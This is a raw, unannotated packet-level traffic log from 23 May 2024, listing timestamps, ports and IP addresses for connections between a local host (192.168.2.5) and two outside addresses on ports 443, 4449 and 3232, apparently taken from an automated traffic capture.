May 23, 2024 15:34:08.815700054 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:08.815730095 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:08.815979958 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:08.816299915 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:08.816338062 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:09.355946064 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.357237101 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.357251883 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.357338905 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.358457088 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.360888004 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.360902071 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.360927105 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.365705013 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.365837097 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.368113041 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.368127108 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.368175983 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.385998964 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.397835016 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.397913933 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.398185968 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.407605886 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.455401897 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.457417965 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.511492014 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.511562109 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.511632919 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.518876076 CEST	443	61019	149.154.167.220	192.168.2.5
May 23, 2024 15:34:09.520123959 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.520661116 CEST	61019	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:09.520669937 CEST	443	61019	149.154.167.220	192.168.2.5
May 23, 2024 15:34:09.522180080 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.532113075 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:09.534012079 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:09.534096956 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:09.534349918 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.534533978 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.548739910 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.825778008 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.826267958 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.827069044 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.827128887 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.828320026 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.828335047 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.828363895 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.829593897 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.829627991 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.830816984 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.832066059 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.832082033 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.832113981 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.834553957 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.835560083 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.835576057 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.835606098 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.835633993 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.837577105 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.837594032 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.837606907 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.837651014 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.839436054 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.839451075 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.839500904 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.841439009 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.841454983 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.841486931 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.843408108 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.843424082 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.843451023 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.844700098 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:09.849577904 CEST	443	61019	149.154.167.220	192.168.2.5
May 23, 2024 15:34:09.898186922 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.898289919 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:09.898690939 CEST	61019	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:09.926112890 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.926825047 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.926884890 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.927598000 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.927614927 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.927661896 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.928581953 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.929580927 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.929631948 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.930633068 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.930653095 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.930695057 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.932568073 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.933585882 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.933603048 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.933636904 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.935575008 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.935590982 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.935601950 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.935616970 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.935642958 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.937572956 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.938383102 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.938401937 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.938431025 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.939980030 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.939995050 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.940018892 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.941565990 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.941581964 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.941610098 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.942588091 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.942636013 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.946154118 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.946475983 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.946523905 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.947273970 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.947288036 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.947336912 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.948740005 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.949440002 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.949454069 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.949487925 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.950874090 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.950884104 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.950890064 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.950917959 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.950948954 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.952260017 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.952269077 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.952311039 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.953388929 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.954016924 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.954071999 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:09.955651999 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.955662012 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:09.955705881 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.003592968 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.003743887 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.008188009 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.008562088 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.008610964 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.016931057 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.017282963 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.017349958 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.018035889 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.018748045 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.018809080 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.019462109 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.019495010 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.019551992 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.020226955 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.020261049 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.020307064 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.021678925 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.022438049 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.022470951 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.022505999 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.023876905 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.023910999 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.023937941 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.025321007 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.025376081 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.025913000 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.025947094 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.025979996 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.025991917 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.027080059 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.027113914 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.027138948 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.028273106 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.028306961 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.028331995 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.029422998 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.029457092 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.029481888 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.030566931 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.030601025 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.030622959 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.030632973 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.030674934 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.031712055 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.078830004 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.078984022 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.283416033 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.283451080 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.283730984 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.284393072 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.284425020 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.284446955 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.284446955 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.285140038 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.285936117 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.287695885 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.288007021 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.288583040 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.289937019 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.293181896 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.293378115 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.294518948 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.299181938 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.299218893 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.300401926 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.300457954 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.300457954 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.305319071 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.330280066 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.366616964 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.379407883 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.379448891 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.379987955 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.380562067 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.380630016 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.380630970 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.381228924 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.381263018 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.381333113 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.382452011 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.382998943 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.383032084 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.383074999 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.383085012 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.384032965 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.384066105 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.384097099 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.384138107 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.384138107 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.385051012 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.385524035 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.385690928 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.386079073 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.386549950 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.386599064 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.387155056 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.389147997 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.389199018 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.389240026 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.389867067 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.389930010 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.394531965 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.394563913 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.394617081 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.440537930 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.440689087 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.441936016 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.445489883 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.470200062 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.470269918 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.470383883 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.470937967 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.470973969 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.471007109 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.471817970 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.471869946 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.472342968 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.472767115 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.472799063 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.472815990 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.473723888 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.473758936 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.473779917 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.473789930 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.474507093 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.474652052 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.475038052 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.475393057 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.695415974 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.695575953 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.777856112 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.778718948 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:10.778796911 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:10.778882980 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:10.778897047 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:10.779166937 CEST	61019	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:10.779184103 CEST	443	61019	149.154.167.220	192.168.2.5
May 23, 2024 15:34:10.779520035 CEST	61019	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:10.779525042 CEST	443	61019	149.154.167.220	192.168.2.5
May 23, 2024 15:34:10.779884100 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:10.779906988 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:10.780102015 CEST	61019	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:10.780107975 CEST	443	61019	149.154.167.220	192.168.2.5
May 23, 2024 15:34:10.783092022 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.783483982 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.783534050 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.783916950 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.784387112 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.784431934 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.784790039 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.785275936 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.785309076 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.785320997 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.786135912 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.786181927 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.786751986 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.787024021 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.787058115 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.787070990 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.787100077 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.787141085 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.787684917 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.788048029 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.788080931 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.788086891 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.792712927 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.792787075 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.792817116 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.792849064 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.792882919 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.792891979 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.792915106 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.792953014 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.792963982 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.792996883 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.793029070 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.793035984 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.793127060 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.793159008 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.793170929 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.793842077 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.793874979 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.793901920 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.793906927 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.793945074 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.794570923 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.794605017 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.794658899 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.795268059 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.795514107 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.795564890 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.797554016 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.797789097 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.797846079 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.800426006 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.802087069 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.802151918 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.805179119 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.806521893 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.806581974 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.809906006 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.810964108 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.811034918 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.814672947 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:10.867037058 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.985064030 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:10.988202095 CEST	61019	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:10.988214970 CEST	443	61019	149.154.167.220	192.168.2.5
